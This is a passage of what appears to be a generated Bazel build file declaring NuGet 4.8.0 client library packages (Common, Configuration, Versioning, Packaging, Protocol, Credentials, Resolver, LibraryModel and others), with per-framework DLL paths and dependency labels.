"lib/netstandard1.6/NuGet.Common.dll",
"lib/netstandard1.6/NuGet.Common.xml",
],
"netstandard2.0": [
"lib/netstandard1.6/NuGet.Common.dll",
"lib/netstandard1.6/NuGet.Common.xml",
],
},
mono_files = [
"lib/net46/NuGet.Common.dll",
"lib/net46/NuGet.Common.xml",
],
)
nuget_package(
name = "nuget.configuration",
package = "nuget.configuration",
version = "4.8.0",
core_lib = {
"netcoreapp2.0": "lib/netstandard1.6/NuGet.Configuration.dll",
"netcoreapp2.1": "lib/netstandard1.6/NuGet.Configuration.dll",
},
net_lib = {
"net46": "lib/net46/NuGet.Configuration.dll",
"net461": "lib/net46/NuGet.Configuration.dll",
"net462": "lib/net46/NuGet.Configuration.dll",
"net47": "lib/net46/NuGet.Configuration.dll",
"net471": "lib/net46/NuGet.Configuration.dll",
"net472": "lib/net46/NuGet.Configuration.dll",
"netstandard1.6": "lib/netstandard1.6/NuGet.Configuration.dll",
"netstandard2.0": "lib/netstandard1.6/NuGet.Configuration.dll",
},
mono_lib = "lib/net46/NuGet.Configuration.dll",
core_deps = {
"net46": [
"@nuget.common//:net46_net",
],
"net461": [
"@nuget.common//:net461_net",
],
"net462": [
"@nuget.common//:net462_net",
],
"net47": [
"@nuget.common//:net47_net",
],
"net471": [
"@nuget.common//:net471_net",
],
"net472": [
"@nuget.common//:net472_net",
],
"netstandard1.6": [
"@nuget.common//:netstandard1.6_net",
],
"netstandard2.0": [
"@nuget.common//:netstandard2.0_net",
],
},
net_deps = {
"net46": [
"@nuget.common//:net46_net",
],
"net461": [
"@nuget.common//:net461_net",
],
"net462": [
"@nuget.common//:net462_net",
],
"net47": [
"@nuget.common//:net47_net",
],
"net471": [
"@nuget.common//:net471_net",
],
"net472": [
"@nuget.common//:net472_net",
],
"netstandard1.6": [
"@nuget.common//:netstandard1.6_net",
],
"netstandard2.0": [
"@nuget.common//:netstandard2.0_net",
],
},
mono_deps = [
"@nuget.common//:mono",
],
core_files = {
"netcoreapp2.0": [
"lib/netstandard1.6/NuGet.Configuration.dll",
"lib/netstandard1.6/NuGet.Configuration.xml",
],
"netcoreapp2.1": [
"lib/netstandard1.6/NuGet.Configuration.dll",
"lib/netstandard1.6/NuGet.Configuration.xml",
],
},
net_files = {
"net46": [
"lib/net46/NuGet.Configuration.dll",
"lib/net46/NuGet.Configuration.xml",
],
"net461": [
"lib/net46/NuGet.Configuration.dll",
"lib/net46/NuGet.Configuration.xml",
],
"net462": [
"lib/net46/NuGet.Configuration.dll",
"lib/net46/NuGet.Configuration.xml",
],
"net47": [
"lib/net46/NuGet.Configuration.dll",
"lib/net46/NuGet.Configuration.xml",
],
"net471": [
"lib/net46/NuGet.Configuration.dll",
"lib/net46/NuGet.Configuration.xml",
],
"net472": [
"lib/net46/NuGet.Configuration.dll",
"lib/net46/NuGet.Configuration.xml",
],
"netstandard1.6": [
"lib/netstandard1.6/NuGet.Configuration.dll",
"lib/netstandard1.6/NuGet.Configuration.xml",
],
"netstandard2.0": [
"lib/netstandard1.6/NuGet.Configuration.dll",
"lib/netstandard1.6/NuGet.Configuration.xml",
],
},
mono_files = [
"lib/net46/NuGet.Configuration.dll",
"lib/net46/NuGet.Configuration.xml",
],
)
nuget_package(
name = "nuget.versioning",
package = "nuget.versioning",
version = "4.8.0",
core_lib = {
"netcoreapp2.0": "lib/netstandard1.6/NuGet.Versioning.dll",
"netcoreapp2.1": "lib/netstandard1.6/NuGet.Versioning.dll",
},
net_lib = {
"net46": "lib/net46/NuGet.Versioning.dll",
"net461": "lib/net46/NuGet.Versioning.dll",
"net462": "lib/net46/NuGet.Versioning.dll",
"net47": "lib/net46/NuGet.Versioning.dll",
"net471": "lib/net46/NuGet.Versioning.dll",
"net472": "lib/net46/NuGet.Versioning.dll",
"netstandard1.6": "lib/netstandard1.6/NuGet.Versioning.dll",
"netstandard2.0": "lib/netstandard1.6/NuGet.Versioning.dll",
},
mono_lib = "lib/net46/NuGet.Versioning.dll",
core_files = {
"netcoreapp2.0": [
"lib/netstandard1.6/NuGet.Versioning.dll",
"lib/netstandard1.6/NuGet.Versioning.xml",
],
"netcoreapp2.1": [
"lib/netstandard1.6/NuGet.Versioning.dll",
"lib/netstandard1.6/NuGet.Versioning.xml",
],
},
net_files = {
"net46": [
"lib/net46/NuGet.Versioning.dll",
"lib/net46/NuGet.Versioning.xml",
],
"net461": [
"lib/net46/NuGet.Versioning.dll",
"lib/net46/NuGet.Versioning.xml",
],
"net462": [
"lib/net46/NuGet.Versioning.dll",
"lib/net46/NuGet.Versioning.xml",
],
"net47": [
"lib/net46/NuGet.Versioning.dll",
"lib/net46/NuGet.Versioning.xml",
],
"net471": [
"lib/net46/NuGet.Versioning.dll",
"lib/net46/NuGet.Versioning.xml",
],
"net472": [
"lib/net46/NuGet.Versioning.dll",
"lib/net46/NuGet.Versioning.xml",
],
"netstandard1.6": [
"lib/netstandard1.6/NuGet.Versioning.dll",
"lib/netstandard1.6/NuGet.Versioning.xml",
],
"netstandard2.0": [
"lib/netstandard1.6/NuGet.Versioning.dll",
"lib/netstandard1.6/NuGet.Versioning.xml",
],
},
mono_files = [
"lib/net46/NuGet.Versioning.dll",
"lib/net46/NuGet.Versioning.xml",
],
)
nuget_package(
name = "nuget.packaging.core",
package = "nuget.packaging.core",
version = "4.8.0",
core_lib = {
"netcoreapp2.0": "lib/netstandard1.6/NuGet.Packaging.Core.dll",
"netcoreapp2.1": "lib/netstandard1.6/NuGet.Packaging.Core.dll",
},
net_lib = {
"net46": "lib/net46/NuGet.Packaging.Core.dll",
"net461": "lib/net46/NuGet.Packaging.Core.dll",
"net462": "lib/net46/NuGet.Packaging.Core.dll",
"net47": "lib/net46/NuGet.Packaging.Core.dll",
"net471": "lib/net46/NuGet.Packaging.Core.dll",
"net472": "lib/net46/NuGet.Packaging.Core.dll",
"netstandard1.6": "lib/netstandard1.6/NuGet.Packaging.Core.dll",
"netstandard2.0": "lib/netstandard1.6/NuGet.Packaging.Core.dll",
},
mono_lib = "lib/net46/NuGet.Packaging.Core.dll",
core_deps = {
"net46": [
"@nuget.common//:net46_net",
"@nuget.versioning//:net46_net",
],
"net461": [
"@nuget.common//:net461_net",
"@nuget.versioning//:net461_net",
],
"net462": [
"@nuget.common//:net462_net",
"@nuget.versioning//:net462_net",
],
"net47": [
"@nuget.common//:net47_net",
"@nuget.versioning//:net47_net",
],
"net471": [
"@nuget.common//:net471_net",
"@nuget.versioning//:net471_net",
],
"net472": [
"@nuget.common//:net472_net",
"@nuget.versioning//:net472_net",
],
"netstandard1.6": [
"@nuget.common//:netstandard1.6_net",
"@nuget.versioning//:netstandard1.6_net",
],
"netstandard2.0": [
"@nuget.common//:netstandard2.0_net",
"@nuget.versioning//:netstandard2.0_net",
],
},
net_deps = {
"net46": [
"@nuget.common//:net46_net",
"@nuget.versioning//:net46_net",
],
"net461": [
"@nuget.common//:net461_net",
"@nuget.versioning//:net461_net",
],
"net462": [
"@nuget.common//:net462_net",
"@nuget.versioning//:net462_net",
],
"net47": [
"@nuget.common//:net47_net",
"@nuget.versioning//:net47_net",
],
"net471": [
"@nuget.common//:net471_net",
"@nuget.versioning//:net471_net",
],
"net472": [
"@nuget.common//:net472_net",
"@nuget.versioning//:net472_net",
],
"netstandard1.6": [
"@nuget.common//:netstandard1.6_net",
"@nuget.versioning//:netstandard1.6_net",
],
"netstandard2.0": [
"@nuget.common//:netstandard2.0_net",
"@nuget.versioning//:netstandard2.0_net",
],
},
mono_deps = [
"@nuget.common//:mono",
"@nuget.versioning//:mono",
],
core_files = {
"netcoreapp2.0": [
"lib/netstandard1.6/NuGet.Packaging.Core.dll",
"lib/netstandard1.6/NuGet.Packaging.Core.xml",
],
"netcoreapp2.1": [
"lib/netstandard1.6/NuGet.Packaging.Core.dll",
"lib/netstandard1.6/NuGet.Packaging.Core.xml",
],
},
net_files = {
"net46": [
"lib/net46/NuGet.Packaging.Core.dll",
"lib/net46/NuGet.Packaging.Core.xml",
],
"net461": [
"lib/net46/NuGet.Packaging.Core.dll",
"lib/net46/NuGet.Packaging.Core.xml",
],
"net462": [
"lib/net46/NuGet.Packaging.Core.dll",
"lib/net46/NuGet.Packaging.Core.xml",
],
"net47": [
"lib/net46/NuGet.Packaging.Core.dll",
"lib/net46/NuGet.Packaging.Core.xml",
],
"net471": [
"lib/net46/NuGet.Packaging.Core.dll",
"lib/net46/NuGet.Packaging.Core.xml",
],
"net472": [
"lib/net46/NuGet.Packaging.Core.dll",
"lib/net46/NuGet.Packaging.Core.xml",
],
"netstandard1.6": [
"lib/netstandard1.6/NuGet.Packaging.Core.dll",
"lib/netstandard1.6/NuGet.Packaging.Core.xml",
],
"netstandard2.0": [
"lib/netstandard1.6/NuGet.Packaging.Core.dll",
"lib/netstandard1.6/NuGet.Packaging.Core.xml",
],
},
mono_files = [
"lib/net46/NuGet.Packaging.Core.dll",
"lib/net46/NuGet.Packaging.Core.xml",
],
)
nuget_package(
name = "nuget.packaging",
package = "nuget.packaging",
version = "4.8.0",
core_lib = {
"netcoreapp2.0": "lib/netstandard1.6/NuGet.Packaging.dll",
"netcoreapp2.1": "lib/netstandard1.6/NuGet.Packaging.dll",
},
net_lib = {
"net46": "lib/net46/NuGet.Packaging.dll",
"net461": "lib/net46/NuGet.Packaging.dll",
"net462": "lib/net46/NuGet.Packaging.dll",
"net47": "lib/net46/NuGet.Packaging.dll",
"net471": "lib/net46/NuGet.Packaging.dll",
"net472": "lib/net46/NuGet.Packaging.dll",
"netstandard1.6": "lib/netstandard1.6/NuGet.Packaging.dll",
"netstandard2.0": "lib/netstandard1.6/NuGet.Packaging.dll",
},
mono_lib = "lib/net46/NuGet.Packaging.dll",
core_deps = {
"net46": [
"@nuget.packaging.core//:net46_net",
"@newtonsoft.json//:net46_net",
],
"net461": [
"@nuget.packaging.core//:net461_net",
"@newtonsoft.json//:net461_net",
],
"net462": [
"@nuget.packaging.core//:net462_net",
"@newtonsoft.json//:net462_net",
],
"net47": [
"@nuget.packaging.core//:net47_net",
"@newtonsoft.json//:net47_net",
],
"net471": [
"@nuget.packaging.core//:net471_net",
"@newtonsoft.json//:net471_net",
],
"net472": [
"@nuget.packaging.core//:net472_net",
"@newtonsoft.json//:net472_net",
],
"netstandard1.6": [
"@nuget.packaging.core//:netstandard1.6_net",
"@newtonsoft.json//:netstandard1.6_net",
],
"netstandard2.0": [
"@nuget.packaging.core//:netstandard2.0_net",
"@newtonsoft.json//:netstandard2.0_net",
],
},
net_deps = {
"net46": [
"@nuget.packaging.core//:net46_net",
"@newtonsoft.json//:net46_net",
],
"net461": [
"@nuget.packaging.core//:net461_net",
"@newtonsoft.json//:net461_net",
],
"net462": [
"@nuget.packaging.core//:net462_net",
"@newtonsoft.json//:net462_net",
],
"net47": [
"@nuget.packaging.core//:net47_net",
"@newtonsoft.json//:net47_net",
],
"net471": [
"@nuget.packaging.core//:net471_net",
"@newtonsoft.json//:net471_net",
],
"net472": [
"@nuget.packaging.core//:net472_net",
"@newtonsoft.json//:net472_net",
],
"netstandard1.6": [
"@nuget.packaging.core//:netstandard1.6_net",
"@newtonsoft.json//:netstandard1.6_net",
],
"netstandard2.0": [
"@nuget.packaging.core//:netstandard2.0_net",
"@newtonsoft.json//:netstandard2.0_net",
],
},
mono_deps = [
"@nuget.packaging.core//:mono",
"@newtonsoft.json//:mono",
],
core_files = {
"netcoreapp2.0": [
"lib/netstandard1.6/NuGet.Packaging.dll",
"lib/netstandard1.6/NuGet.Packaging.xml",
],
"netcoreapp2.1": [
"lib/netstandard1.6/NuGet.Packaging.dll",
"lib/netstandard1.6/NuGet.Packaging.xml",
],
},
net_files = {
"net46": [
"lib/net46/NuGet.Packaging.dll",
"lib/net46/NuGet.Packaging.xml",
],
"net461": [
"lib/net46/NuGet.Packaging.dll",
"lib/net46/NuGet.Packaging.xml",
],
"net462": [
"lib/net46/NuGet.Packaging.dll",
"lib/net46/NuGet.Packaging.xml",
],
"net47": [
"lib/net46/NuGet.Packaging.dll",
"lib/net46/NuGet.Packaging.xml",
],
"net471": [
"lib/net46/NuGet.Packaging.dll",
"lib/net46/NuGet.Packaging.xml",
],
"net472": [
"lib/net46/NuGet.Packaging.dll",
"lib/net46/NuGet.Packaging.xml",
],
"netstandard1.6": [
"lib/netstandard1.6/NuGet.Packaging.dll",
"lib/netstandard1.6/NuGet.Packaging.xml",
],
"netstandard2.0": [
"lib/netstandard1.6/NuGet.Packaging.dll",
"lib/netstandard1.6/NuGet.Packaging.xml",
],
},
mono_files = [
"lib/net46/NuGet.Packaging.dll",
"lib/net46/NuGet.Packaging.xml",
],
)
nuget_package(
name = "nuget.protocol",
package = "nuget.protocol",
version = "4.8.0",
core_lib = {
"netcoreapp2.0": "lib/netstandard1.6/NuGet.Protocol.dll",
"netcoreapp2.1": "lib/netstandard1.6/NuGet.Protocol.dll",
},
net_lib = {
"net46": "lib/net46/NuGet.Protocol.dll",
"net461": "lib/net46/NuGet.Protocol.dll",
"net462": "lib/net46/NuGet.Protocol.dll",
"net47": "lib/net46/NuGet.Protocol.dll",
"net471": "lib/net46/NuGet.Protocol.dll",
"net472": "lib/net46/NuGet.Protocol.dll",
"netstandard1.6": "lib/netstandard1.6/NuGet.Protocol.dll",
"netstandard2.0": "lib/netstandard1.6/NuGet.Protocol.dll",
},
mono_lib = "lib/net46/NuGet.Protocol.dll",
core_deps = {
"net46": [
"@nuget.configuration//:net46_net",
"@nuget.packaging//:net46_net",
],
"net461": [
"@nuget.configuration//:net461_net",
"@nuget.packaging//:net461_net",
],
"net462": [
"@nuget.configuration//:net462_net",
"@nuget.packaging//:net462_net",
],
"net47": [
"@nuget.configuration//:net47_net",
"@nuget.packaging//:net47_net",
],
"net471": [
"@nuget.configuration//:net471_net",
"@nuget.packaging//:net471_net",
],
"net472": [
"@nuget.configuration//:net472_net",
"@nuget.packaging//:net472_net",
],
"netstandard1.6": [
"@nuget.configuration//:netstandard1.6_net",
"@nuget.packaging//:netstandard1.6_net",
],
"netstandard2.0": [
"@nuget.configuration//:netstandard2.0_net",
"@nuget.packaging//:netstandard2.0_net",
],
},
net_deps = {
"net46": [
"@nuget.configuration//:net46_net",
"@nuget.packaging//:net46_net",
],
"net461": [
"@nuget.configuration//:net461_net",
"@nuget.packaging//:net461_net",
],
"net462": [
"@nuget.configuration//:net462_net",
"@nuget.packaging//:net462_net",
],
"net47": [
"@nuget.configuration//:net47_net",
"@nuget.packaging//:net47_net",
],
"net471": [
"@nuget.configuration//:net471_net",
"@nuget.packaging//:net471_net",
],
"net472": [
"@nuget.configuration//:net472_net",
"@nuget.packaging//:net472_net",
],
"netstandard1.6": [
"@nuget.configuration//:netstandard1.6_net",
"@nuget.packaging//:netstandard1.6_net",
],
"netstandard2.0": [
"@nuget.configuration//:netstandard2.0_net",
"@nuget.packaging//:netstandard2.0_net",
],
},
mono_deps = [
"@nuget.configuration//:mono",
"@nuget.packaging//:mono",
],
core_files = {
"netcoreapp2.0": [
"lib/netstandard1.6/NuGet.Protocol.dll",
"lib/netstandard1.6/NuGet.Protocol.xml",
],
"netcoreapp2.1": [
"lib/netstandard1.6/NuGet.Protocol.dll",
"lib/netstandard1.6/NuGet.Protocol.xml",
],
},
net_files = {
"net46": [
"lib/net46/NuGet.Protocol.dll",
"lib/net46/NuGet.Protocol.xml",
],
"net461": [
"lib/net46/NuGet.Protocol.dll",
"lib/net46/NuGet.Protocol.xml",
],
"net462": [
"lib/net46/NuGet.Protocol.dll",
"lib/net46/NuGet.Protocol.xml",
],
"net47": [
"lib/net46/NuGet.Protocol.dll",
"lib/net46/NuGet.Protocol.xml",
],
"net471": [
"lib/net46/NuGet.Protocol.dll",
"lib/net46/NuGet.Protocol.xml",
],
"net472": [
"lib/net46/NuGet.Protocol.dll",
"lib/net46/NuGet.Protocol.xml",
],
"netstandard1.6": [
"lib/netstandard1.6/NuGet.Protocol.dll",
"lib/netstandard1.6/NuGet.Protocol.xml",
],
"netstandard2.0": [
"lib/netstandard1.6/NuGet.Protocol.dll",
"lib/netstandard1.6/NuGet.Protocol.xml",
],
},
mono_files = [
"lib/net46/NuGet.Protocol.dll",
"lib/net46/NuGet.Protocol.xml",
],
)
nuget_package(
name = "nuget.credentials",
package = "nuget.credentials",
version = "4.8.0",
core_lib = {
"netcoreapp2.0": "lib/netstandard1.6/NuGet.Credentials.dll",
"netcoreapp2.1": "lib/netstandard1.6/NuGet.Credentials.dll",
},
net_lib = {
"net46": "lib/net46/NuGet.Credentials.dll",
"net461": "lib/net46/NuGet.Credentials.dll",
"net462": "lib/net46/NuGet.Credentials.dll",
"net47": "lib/net46/NuGet.Credentials.dll",
"net471": "lib/net46/NuGet.Credentials.dll",
"net472": "lib/net46/NuGet.Credentials.dll",
"netstandard1.6": "lib/netstandard1.6/NuGet.Credentials.dll",
"netstandard2.0": "lib/netstandard1.6/NuGet.Credentials.dll",
},
mono_lib = "lib/net46/NuGet.Credentials.dll",
core_deps = {
"net46": [
"@nuget.protocol//:net46_net",
],
"net461": [
"@nuget.protocol//:net461_net",
],
"net462": [
"@nuget.protocol//:net462_net",
],
"net47": [
"@nuget.protocol//:net47_net",
],
"net471": [
"@nuget.protocol//:net471_net",
],
"net472": [
"@nuget.protocol//:net472_net",
],
"netstandard1.6": [
"@nuget.protocol//:netstandard1.6_net",
],
"netstandard2.0": [
"@nuget.protocol//:netstandard2.0_net",
],
},
net_deps = {
"net46": [
"@nuget.protocol//:net46_net",
],
"net461": [
"@nuget.protocol//:net461_net",
],
"net462": [
"@nuget.protocol//:net462_net",
],
"net47": [
"@nuget.protocol//:net47_net",
],
"net471": [
"@nuget.protocol//:net471_net",
],
"net472": [
"@nuget.protocol//:net472_net",
],
"netstandard1.6": [
"@nuget.protocol//:netstandard1.6_net",
],
"netstandard2.0": [
"@nuget.protocol//:netstandard2.0_net",
],
},
mono_deps = [
"@nuget.protocol//:mono",
],
core_files = {
"netcoreapp2.0": [
"lib/netstandard1.6/NuGet.Credentials.dll",
],
"netcoreapp2.1": [
"lib/netstandard1.6/NuGet.Credentials.dll",
],
},
net_files = {
"net46": [
"lib/net46/NuGet.Credentials.dll",
],
"net461": [
"lib/net46/NuGet.Credentials.dll",
],
"net462": [
"lib/net46/NuGet.Credentials.dll",
],
"net47": [
"lib/net46/NuGet.Credentials.dll",
],
"net471": [
"lib/net46/NuGet.Credentials.dll",
],
"net472": [
"lib/net46/NuGet.Credentials.dll",
],
"netstandard1.6": [
"lib/netstandard1.6/NuGet.Credentials.dll",
],
"netstandard2.0": [
"lib/netstandard1.6/NuGet.Credentials.dll",
],
},
mono_files = [
"lib/net46/NuGet.Credentials.dll",
],
)
nuget_package(
name = "nuget.resolver",
package = "nuget.resolver",
version = "4.8.0",
core_lib = {
"netcoreapp2.0": "lib/netstandard1.6/NuGet.Resolver.dll",
"netcoreapp2.1": "lib/netstandard1.6/NuGet.Resolver.dll",
},
net_lib = {
"net46": "lib/net46/NuGet.Resolver.dll",
"net461": "lib/net46/NuGet.Resolver.dll",
"net462": "lib/net46/NuGet.Resolver.dll",
"net47": "lib/net46/NuGet.Resolver.dll",
"net471": "lib/net46/NuGet.Resolver.dll",
"net472": "lib/net46/NuGet.Resolver.dll",
"netstandard1.6": "lib/netstandard1.6/NuGet.Resolver.dll",
"netstandard2.0": "lib/netstandard1.6/NuGet.Resolver.dll",
},
mono_lib = "lib/net46/NuGet.Resolver.dll",
core_deps = {
"net46": [
"@nuget.protocol//:net46_net",
],
"net461": [
"@nuget.protocol//:net461_net",
],
"net462": [
"@nuget.protocol//:net462_net",
],
"net47": [
"@nuget.protocol//:net47_net",
],
"net471": [
"@nuget.protocol//:net471_net",
],
"net472": [
"@nuget.protocol//:net472_net",
],
"netstandard1.6": [
"@nuget.protocol//:netstandard1.6_net",
],
"netstandard2.0": [
"@nuget.protocol//:netstandard2.0_net",
],
},
net_deps = {
"net46": [
"@nuget.protocol//:net46_net",
],
"net461": [
"@nuget.protocol//:net461_net",
],
"net462": [
"@nuget.protocol//:net462_net",
],
"net47": [
"@nuget.protocol//:net47_net",
],
"net471": [
"@nuget.protocol//:net471_net",
],
"net472": [
"@nuget.protocol//:net472_net",
],
"netstandard1.6": [
"@nuget.protocol//:netstandard1.6_net",
],
"netstandard2.0": [
"@nuget.protocol//:netstandard2.0_net",
],
},
mono_deps = [
"@nuget.protocol//:mono",
],
core_files = {
"netcoreapp2.0": [
"lib/netstandard1.6/NuGet.Resolver.dll",
"lib/netstandard1.6/NuGet.Resolver.xml",
],
"netcoreapp2.1": [
"lib/netstandard1.6/NuGet.Resolver.dll",
"lib/netstandard1.6/NuGet.Resolver.xml",
],
},
net_files = {
"net46": [
"lib/net46/NuGet.Resolver.dll",
"lib/net46/NuGet.Resolver.xml",
],
"net461": [
"lib/net46/NuGet.Resolver.dll",
"lib/net46/NuGet.Resolver.xml",
],
"net462": [
"lib/net46/NuGet.Resolver.dll",
"lib/net46/NuGet.Resolver.xml",
],
"net47": [
"lib/net46/NuGet.Resolver.dll",
"lib/net46/NuGet.Resolver.xml",
],
"net471": [
"lib/net46/NuGet.Resolver.dll",
"lib/net46/NuGet.Resolver.xml",
],
"net472": [
"lib/net46/NuGet.Resolver.dll",
"lib/net46/NuGet.Resolver.xml",
],
"netstandard1.6": [
"lib/netstandard1.6/NuGet.Resolver.dll",
"lib/netstandard1.6/NuGet.Resolver.xml",
],
"netstandard2.0": [
"lib/netstandard1.6/NuGet.Resolver.dll",
"lib/netstandard1.6/NuGet.Resolver.xml",
],
},
mono_files = [
"lib/net46/NuGet.Resolver.dll",
"lib/net46/NuGet.Resolver.xml",
],
)
nuget_package(
name = "nuget.librarymodel",
package = "nuget.librarymodel",
version = "4.8.0",
core_lib = {
"netcoreapp2.0": "lib/netstandard1.6/NuGet.LibraryModel.dll",
"netcoreapp2.1": "lib/netstandard1.6/NuGet.LibraryModel.dll",
},
net_lib = {
"net46": "lib/net46/NuGet.LibraryModel.dll",
"net461": "lib/net46/NuGet.LibraryModel.dll",
"net462": "lib/net46/NuGet.LibraryModel.dll",
"net47": "lib/net46/NuGet.LibraryModel.dll",
"net471": "lib/net46/NuGet.LibraryModel.dll",
"net472": "lib/net46/NuGet.LibraryModel.dll",
"netstandard1.6": "lib/netstandard1.6/NuGet.LibraryModel.dll",
"netstandard2.0": "lib/netstandard1.6/NuGet.LibraryModel.dll",
},
mono_lib = "lib/net46/NuGet.LibraryModel.dll",
core_deps = {
"net46": [
"@nuget.common//:net46_net",
"@nuget.versioning//:net46_net",
],
"net461": [
"@nuget.common//:net461_net",
"@nuget.versioning//:net461_net",
],
"net462": [
"@nuget.common//:net462_net",
"@nuget.versioning//:net462_net",
],
"net47": [
"@nuget.common//:net47_net",
"@nuget.versioning//:net47_net",
],
"net471": [
"@nuget.common//:net471_net",
"@nuget.versioning//:net471_net",
],
"net472": [
"@nuget.common//:net472_net",
"@nuget.versioning//:net472_net",
],
"netstandard1.6": [
"@nuget.common//:netstandard1.6_net",
"@nuget.versioning//:netstandard1.6_net",
],
"netstandard2.0": [
"@nuget.common//:netstandard2.0_net",
"@nuget.versioning//:netstandard2.0_net",
],
},
net_deps = {
"net46": [
"@nuget.common//:net46_net",
"@nuget.versioning//:net46_net",
],
"net461": [
"@nuget.common//:net461_net",
"@nuget.versioning//:net461_net",
],
"net462": [
"@nuget.common//:net462_net",
"@nuget.versioning//:net462_net",
],
"net47": [
"@nuget.common//:net47_net",
"@nuget.versioning//:net47_net",
],
"net471": [
"@nuget.common//:net471_net",
"@nuget.versioning//:net471_net",
],
"net472": [
"@nuget.common//:net472_net",
"@nuget.versioning//:net472_net",
],
"netstandard1.6": [
"@nuget.common//:netstandard1.6_net",
"@nuget.versioning//:netstandard1.6_net",
],
"netstandard2.0": [
"@nuget.common//:netstandard2.0_net",
"@nuget.versioning//:netstandard2.0_net",
],
},
mono_deps = [
"@nuget.common//:mono",
"@nuget.versioning//:mono",
],
core_files = {
"netcoreapp2.0": [
"lib/netstandard1.6/NuGet.LibraryModel.dll",
"lib/netstandard1.6/NuGet.LibraryModel.xml",
],
"netcoreapp2.1": [
"lib/netstandard1.6/NuGet.LibraryModel.dll",
"lib/netstandard1.6/NuGet.LibraryModel.xml",
],
},
net_files = {
"net46": [
"lib/net46/NuGet.LibraryModel.dll",
"lib/net46/NuGet.LibraryModel.xml",
],
"net461": [
"lib/net46/NuGet.LibraryModel.dll",
"lib/net46/NuGet.LibraryModel.xml",
],
"net462": [
"lib/net46/NuGet.LibraryModel.dll",
"lib/net46/NuGet.LibraryModel.xml",
],
"net47": [
"lib/net46/NuGet.LibraryModel.dll",
"lib/net46/NuGet.LibraryModel.xml",
],
"net471": [
"lib/net46/NuGet.LibraryModel.dll",
"lib/net46/NuGet.LibraryModel.xml",
],
"net472": [
"lib/net46/NuGet.LibraryModel.dll",
"lib/net46/NuGet.LibraryModel.xml",
],
"netstandard1.6": [
"lib/netstandard1.6/NuGet.LibraryModel.dll",
"lib/netstandard1.6/NuGet.LibraryModel.xml",
],
"netstandard2.0": [
"lib/netstandard1.6/NuGet.LibraryModel.dll",
"lib/netstandard1.6/NuGet.LibraryModel.xml",
],
},
mono_files = [
"lib/net46/NuGet.LibraryModel.dll",
"lib/net46/NuGet.LibraryModel.xml",
],
)
nuget_package(
name = "nuget.dependencyresolver.core",
package = "nuget.dependencyresolver.core",
version = "4.8.0",
core_lib = {
"netcoreapp2.0": "lib/netstandard1.6/NuGet.DependencyResolver.Core.dll",
"netcoreapp2.1": "lib/netstandard1.6/NuGet.DependencyResolver.Core.dll",
},
net_lib = {
"net46": "lib/net46/NuGet.DependencyResolver.Core.dll",
"net461": "lib/net46/NuGet.DependencyResolver.Core.dll",
"net462": "lib/net46/NuGet.DependencyResolver.Core.dll",
"net47": "lib/net46/NuGet.DependencyResolver.Core.dll",
"net471": "lib/net46/NuGet.DependencyResolver.Core.dll",
"net472": "lib/net46/NuGet.DependencyResolver.Core.dll",
"netstandard1.6": "lib/netstandard1.6/NuGet.DependencyResolver.Core.dll",
"netstandard2.0": "lib/netstandard1.6/NuGet.DependencyResolver.Core.dll",
},
mono_lib = "lib/net46/NuGet.DependencyResolver.Core.dll",
core_deps = {
"net46": [
"@nuget.librarymodel//:net46_net",
"@nuget.protocol//:net46_net",
],
"net461": [
"@nuget.librarymodel//:net461_net",
"@nuget.protocol//:net461_net",
],
"net462": [
"@nuget.librarymodel//:net462_net",
"@nuget.protocol//:net462_net",
],
"net47": [
"@nuget.librarymodel//:net47_net",
"@nuget.protocol//:net47_net",
],
"net471": [
"@nuget.librarymodel//:net471_net",
"@nuget.protocol//:net471_net",
],
"net472": [
"@nuget.librarymodel//:net472_net",
"@nuget.protocol//:net472_net",
],
"netstandard1.6": [
"@nuget.librarymodel//:netstandard1.6_net",
"@nuget.protocol//:netstandard1.6_net",
],
"netstandard2.0": [
"@nuget.librarymodel//:netstandard2.0_net",
"@nuget.protocol//:netstandard2.0_net",
],
},
net_deps = {
"net46": [
"@nuget.librarymodel//:net46_net",
"@nuget.protocol//:net46_net",
],
"net461": [
"@nuget.librarymodel//:net461_net",
"@nuget.protocol//:net461_net",
],
"net462": [
"@nuget.librarymodel//:net462_net",
"@nuget.protocol//:net462_net",
],
"net47": [
"@nuget.librarymodel//:net47_net",
"@nuget.protocol//:net47_net",
],
"net471": [
"@nuget.librarymodel//:net471_net",
"@nuget.protocol//:net471_net",
],
"net472": [
"@nuget.librarymodel//:net472_net",
"@nuget.protocol//:net472_net",
],
"netstandard1.6": [
"@nuget.librarymodel//:netstandard1.6_net",
"@nuget.protocol//:netstandard1.6_net",
],
"netstandard2.0": [
"@nuget.librarymodel//:netstandard2.0_net",
"@nuget.protocol//:netstandard2.0_net",
],
},
mono_deps = [
"@nuget.librarymodel//:mono",
"@nuget.protocol//:mono",
],
core_files = {
"netcoreapp2.0": [
"lib/netstandard1.6/NuGet.DependencyResolver.Core.dll",
"lib/netstandard1.6/NuGet.DependencyResolver.Core.xml",
],
"netcoreapp2.1": [
"lib/netstandard1.6/NuGet.DependencyResolver.Core.dll",
"lib/netstandard1.6/NuGet.DependencyResolver.Core.xml",
],
},
net_files = {
"net46": [
"lib/net46/NuGet.DependencyResolver.Core.dll",
"lib/net46/NuGet.DependencyResolver.Core.xml",
],
"net461": [
"lib/net46/NuGet.DependencyResolver.Core.dll",
"lib/net46/NuGet.DependencyResolver.Core.xml",
],
"net462": [
"lib/net46/NuGet.DependencyResolver.Core.dll",
"lib/net46/NuGet.DependencyResolver.Core.xml",
],
"net47": [
"lib/net46/NuGet.DependencyResolver.Core.dll",
"lib/net46/NuGet.DependencyResolver.Core.xml",
],
"net471": [
"lib/net46/NuGet.DependencyResolver.Core.dll",
"lib/net46/NuGet.DependencyResolver.Core.xml",
],
"net472": [
"lib/net46/NuGet.DependencyResolver.Core.dll",
"lib/net46/NuGet.DependencyResolver.Core.xml",
],
"netstandard1.6": [
"lib/netstandard1.6/NuGet.DependencyResolver.Core.dll",
"lib/netstandard1.6/NuGet.DependencyResolver.Core.xml",
],
"netstandard2.0": [
"lib/netstandard1.6/NuGet.DependencyResolver.Core.dll",
"lib/netstandard1.6/NuGet.DependencyResolver.Core.xml",
],
},
mono_files = [
"lib/net46/NuGet.DependencyResolver.Core.dll",
"lib/net46/NuGet.DependencyResolver.Core.xml",
],
)
nuget_package(
name = "nuget.projectmodel",
package = "nuget.projectmodel",
version = "4.8.0",
core_lib = {
"netcoreapp2.0": "lib/netstandard1.6/NuGet.ProjectModel.dll",
"netcoreapp2.1": "lib/netstandard1.6/NuGet.ProjectModel.dll",
},
net_lib = {
"net46": "lib/net46/NuGet.ProjectModel.dll",
"net461": "lib/net46/NuGet.ProjectModel.dll",
